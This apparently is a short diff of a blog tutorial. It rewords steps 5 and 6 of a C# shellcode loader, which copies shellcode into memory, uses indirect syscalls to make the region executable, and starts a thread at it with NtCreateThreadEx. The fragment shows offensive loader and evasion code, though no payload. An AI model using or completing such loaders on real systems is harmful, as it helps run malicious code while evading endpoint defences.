Back to all posts

 Marshal.Copy(shellcodex, 0, pBaseAddress, shellcodex.Length);

-Step 5: Using NtProtectVirtualMemory for changing the page permission of the RW region which has the shellcode to RX.
+Step 5: Use NtProtectVirtualMemory to change the page permissions of the RW region containing the shellcode to RX.

 ntdll.indirectSyscallInvoke<Delegates.NtProtectVirtualMemory>("NtProtectVirtualMemory", new object\[\] { (IntPtr)(-1), pBaseAddress, (IntPtr)size, PAGE_EXECUTE_READ, (uint)0 });

-Step 6: Using NtCreateThreadEx to execute the shellcode on the RX region with the start address pointing to the pBaseAddress.
+Step 6: Use NtCreateThreadEx to execute the shellcode on the RX region with the start address pointing to pBaseAddress.

 IntPtr hThread = IntPtr.Zero;